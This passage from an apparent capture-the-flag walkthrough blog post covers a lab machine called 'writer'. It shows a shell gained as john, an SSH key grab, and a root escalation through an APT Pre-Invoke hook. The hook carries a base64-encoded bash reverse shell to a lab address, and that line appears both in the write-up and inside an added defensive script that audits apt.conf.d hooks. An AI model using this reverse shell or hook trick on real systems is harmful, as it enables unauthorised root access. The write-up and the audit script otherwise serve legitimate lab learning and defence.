    sys.exit(1)

server.starttls()

# Uncomment if logging in with authentication
# server.login(msg['From'], password)

server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()

print("[***]successfully sent email to %s:" % (msg['To']))

PYTHON

The command planted in the disclaimer script fires and the listener gets a shell as john. His private key is readable, so take it for a proper SSH session:

john@writer:/home/john/.ssh$ ls -al
total 20
drwx------ 2 john john 4096 Jul 9 12:29 .
drwxr-xr-x 4 john john 4096 Aug 5 09:56 ..
-rw-r--r-- 1 john john 565 Jul 9 12:29 authorized_keys
-rw------- 1 john john 2602 Jul 9 12:29 id_rsa
-rw-r--r-- 1 john john 565 Jul 9 12:29 id_rsa.pub
john@writer:/home/john/.ssh$

BASH

id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
[...]
-----END OPENSSH PRIVATE KEY-----

TEXT

For root the lever is an APT hook. APT::Update::Pre-Invoke runs the given shell command every time apt-get update is executed, before any index is fetched, and APT reads such directives from the fragments in /etc/apt/apt.conf.d/ (key names are case-insensitive, so the lowercase apt:: below is fine). The file written here carries the same base64 reverse shell as before; all it needs is to end up in that directory and for a privileged apt-get update to run:

echo 'apt::Update::Pre-Invoke {"echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjQvMTAwODYgMD4mMSI= | base64 -d | bash"};'> pwn

BASH
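The defender's side of that trick, as an added example that is not part of the original post: walk an apt.conf.d-style directory, pull out every directive that apt.conf(5) documents as running an external command (APT::Update::Pre-Invoke, Post-Invoke, Post-Invoke-Success, DPkg::Pre-Invoke, DPkg::Post-Invoke and DPkg::Pre-Install-Pkgs), and flag fragments that someone other than the trusted owner could modify. The directory, the planted `pwn` fragment and the benign apt-listchanges fragment are constructed in a temp dir so it runs offline; the `trusted_uid` parameter and the helper names are this example's own. On a real host, call audit_apt_hooks("/etc/apt/apt.conf.d") and look at anything with writable_by_non_root set.

```python
# Added example (not code from the write-up): audit apt.conf.d fragments for
# command-running hook directives and flag ones a non-root user could edit.
# The directory and both fragments below are constructed for the demo.
import os
import re
import stat
import tempfile

# Directives apt.conf(5) documents as executing shell commands, in either of
# APT's two spellings:  Name {"cmd";};   or   Name:: "cmd";
DIRECTIVE_RE = re.compile(
    r"(APT::Update::(?:Pre|Post)-Invoke(?:-Success)?|DPkg::(?:Pre|Post)-Invoke|DPkg::Pre-Install-Pkgs)"
    r'\s*(?:::\s*"([^"]*)"|\{([^}]*)\})',
    re.IGNORECASE,
)
STRING_RE = re.compile(r'"([^"]*)"')


def parse_hooks(text):
    """Return (directive, command) pairs found in one config fragment."""
    hooks = []
    for m in DIRECTIVE_RE.finditer(text):
        name = m.group(1)
        if m.group(2) is not None:              # Name:: "cmd";
            hooks.append((name, m.group(2)))
        else:                                   # Name {"cmd"; "cmd2";};
            for cmd in STRING_RE.findall(m.group(3)):
                hooks.append((name, cmd))
    return hooks


def non_root_writable(path, trusted_uid=0):
    """True if the file is owned by someone other than trusted_uid, or is group/world writable."""
    st = os.stat(path)
    return st.st_uid != trusted_uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_apt_hooks(conf_dir, trusted_uid=0):
    """List every hook directive in conf_dir with a writability verdict per fragment."""
    findings = []
    for name in sorted(os.listdir(conf_dir)):
        path = os.path.join(conf_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        for directive, command in parse_hooks(text):
            findings.append({
                "file": name,
                "directive": directive,
                "command": command,
                "writable_by_non_root": non_root_writable(path, trusted_uid),
            })
    return findings


def demo():
    """Constructed apt.conf.d: the write-up's pwn fragment plus a normal apt-listchanges one."""
    with tempfile.TemporaryDirectory() as d:
        pwn = os.path.join(d, "pwn")
        with open(pwn, "w") as fh:
            fh.write('apt::Update::Pre-Invoke {"echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjQvMTAwODYgMD4mMSI= | base64 -d | bash"};\n')
        os.chmod(pwn, 0o664)      # group-writable: the condition that turns a hook into a privesc
        benign = os.path.join(d, "20listchanges")
        with open(benign, "w") as fh:
            fh.write('DPkg::Pre-Install-Pkgs {"/usr/bin/apt-listchanges --apt || test $? -lt 10";};\n')
            fh.write('DPkg::Tools::Options::/usr/bin/apt-listchanges::Version "2";\n')
        os.chmod(benign, 0o644)
        # The demo's files are owned by whoever runs it, so treat that uid as trusted;
        # on a real host keep the default of 0 (root).
        return audit_apt_hooks(d, trusted_uid=os.geteuid())


if __name__ == "__main__":
    for f in demo():
        print(f)
```

Both fragments are reported, because a hook is worth knowing about either way, but only `pwn` comes back with writable_by_non_root set. The same check applies to the parent directory: a group-writable /etc/apt/apt.conf.d lets anyone in that group drop a fresh fragment, which is what the echo line above is counting on.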

Now you know what needs to be done: grab root, and let us know in the comments whether you managed it.

Keep coming for more.

Happy Hacking!!!!




Written by FreakyDodo

Hey Hackers!! I am Harshit Dodia, aka Freaky Dodo. I am a student of Information Technology and Ethical Hacking.
